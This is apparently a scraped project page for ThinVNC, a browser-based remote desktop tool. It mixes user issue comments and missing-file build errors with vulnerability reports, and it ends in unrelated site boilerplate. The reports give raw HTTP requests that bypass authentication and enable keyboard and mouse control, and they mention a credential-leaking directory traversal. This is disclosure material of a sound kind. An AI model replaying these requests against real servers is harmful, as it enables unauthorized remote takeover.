ThinVNC is a pure HTML5 & AJAX Remote Desktop implementation. ThinVNC works on any HTML5-compliant web browser. Users can access a remote PC from any computer or mobile OS; no additional plugin or installation will be required on the client side.
Home Page: http://sourceforge.net/projects/thinvnc/
License: GNU General Public License v3.0
An authenticated attacker can compromise the VNC server even password protected. There's a bug in the web client which is vulnerable to directory traversal. Accessing the credentials could compromise the whole VNC server and gives an attacker the terminal access to the remote system.
If you have a count of e.g. 4 and want to delete index 3 it moves the last entries name to that deleted position, but leaves the object in place.
So the whole list ist corrupted.
Tryed to rebuild the project but ThinVNC.Unicode is missing
There are VNC remote access vulnerabilities: https://www.kaspersky.com/blog/vnc-vulnerabilities/31462/
how can i disable keyboard access :)
ThinVNC version 1.0b1 allows an unauthenticated user to bypass the authentication process via http://thin-vnc:8080/cmd?cmd=connect by obtaining a valid SID without any kind of authentication. It is possible to achieve code execution on the server by sending keyboard or mouse events to the server.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
10.0
SID.GET /cmd?cmd=connect&destAddr=poc&id=0 HTTP/1.1
Host: 172.16.28.140:8081
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Referer: http://172.16.28.140:8081/
Cookie: SID=SID from the server response and create a new request in order to validate the SID.GET /cmd?cmd=start&mouseControl=true&kbdControl=true&quality=85&pixelFormat=0&monitor=0&id=[SID] HTTP/1.1
Host: 172.16.28.140:8081
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Referer: http://172.16.28.140:8081/
Cookie: SID=[SID]Now it is possible to send keystrokes or mouse moves to the server using the validated SID
An exploit can be used to obtain a reverse shell on the server running the ThinVNC application.
ThinVNC.Unicode
ThinVNC.DigestAuth
ThinVNC.Websockets
are not included and required.
There might be other files missing but the build process stops right there so I can tell for sure
[DCC Fatal Error] ThinVnc.Manager.pas(50): F1026 File not found: 'ThinVnc.WebSockets.dcu'
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google โค๏ธ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.